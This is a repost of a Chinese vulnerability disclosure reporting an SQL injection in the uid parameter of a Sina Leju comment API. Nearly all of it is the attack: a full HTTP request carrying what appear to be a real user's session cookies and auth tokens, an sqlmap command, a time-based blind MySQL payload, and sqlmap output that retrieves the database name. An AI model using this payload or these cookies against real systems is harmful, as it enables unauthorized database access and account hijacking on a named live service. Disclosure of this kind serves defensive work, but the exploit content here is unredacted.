新浪乐居某接口存在SQL注入

16-04-26 来源：[db:作者]

收藏我要投稿

新浪乐居某接口存在SQL注入

注入参数 uid
GET /api/comment/getcomment?callback=jsonp_278cgunw7w6imyb&key=1dd7374509225e5abf1484a8d0965aef&unique_id=6129070685173370162&uid=2970574011* HTTP/1.1
Host: comment.leju.com
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Accept-Encoding: gzip, deflate, sdch
Host: comment.leju.com
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36
Connection: keep-alive
Referer: http://hf.leju.com/news/2016-04-22/08186129070685173370162.shtml
Cookie: M_AUTH=bcf97a064686696b03c5be538b6759fe74a9086b; M_USER=eNpdj8GKAjEMhp%2BmXoQl7bRNcuhhdAoWtlWnncOcZGbcZXEfYNGn3ypeFAL%2FT%2FKFP1nF0xA6pxjBoAYpV7WRfZ%2Fa6J3wKFiLloS3gkhs8IU77PbJu2p8bMPn3eQxl1AX4QMkKcUAa6kNEUgGU%2Bchl13oOzfe%2BstYjtd4%2B0lDAR4vv9f4J5qu1gPL%2B6Hfeoeap7mZLdlGWQJr4YxoiSUa%2BUVSPdhNSJ1b9DJp1dAEM1dRcF4WAzzZbzSkeb4fF1L7%2Fmp5Bql%2F1hZEWg%3D%3D; M_KEY=YmNhNzljMjFZbW91WW1KekxtaHZkWE5sTG5OcGJtRXVZMjl0TG1OdVh6RTBOVGc0T0Rnek1EVT0yZGY4; M_INFO=%7B%22uid%22%3A%222970574011%22%2C%22username%22%3A%22%5Cu7528%5Cu62372970574011%22%2C%22isThird%22%3Atrue%2C%22phone%22%3A%22%22%2C%22headurl%22%3A%22http%3A%5C%2F%5C%2Fp4.sinaimg.cn%5C%2F2970574011%5C%2F180%22%2C%22iscard%22%3Afalse%7D; M_UID=2970574011; M_ITSOURCE=749ab3b68632680660d776891751e812; M_SPRING=YzRjYTQyMzhNUT09YjkyMw%3D%3D; M_TICKET=NGU5ZDc4Y2RZbW91WW1KekxtaHZkWE5sTG5OcGJtRXVZMjl0TG1OdVh6RTBOVGc0TURFNU1EVmZNamszTURVM05EQXhNUT09ZWE5Yw%3D%3D; pgv_pvi=1220687872; city=wh; wapparam=wap2web; citypub=wh; extern_host=hf.leju.com; gatheruuid=56f63df72a5ab810
sqlmap -r 1.txt --dbms=mysql --current-db --technique=T

---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://comment.leju.com:80/api/comment/getcomment?callback=jsonp_278cgunw7w6imyb&key=1dd7374509225e5abf1484a8d0965aef&unique_id=6129070685173370162&uid=2970574011') AND (SELECT * FROM (SELECT(SLEEP(5)))sslJ) AND ('lITm'='lITm
---
[22:49:28] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[22:49:57] [INFO] confirming MySQL
[22:49:57] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[22:50:37] [INFO] adjusting time delay to 4 seconds due to good response times
[22:50:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[22:50:37] [INFO] fetching current database
[22:50:37] [INFO] retrieved: comment_leju_com
current database:    'comment_leju_com'
[23:09:23] [INFO] fetched data logged to text files under '/Users/null0z/.sqlmap/output/comment.leju.com'

点击复制链接与好友分享!回本站首页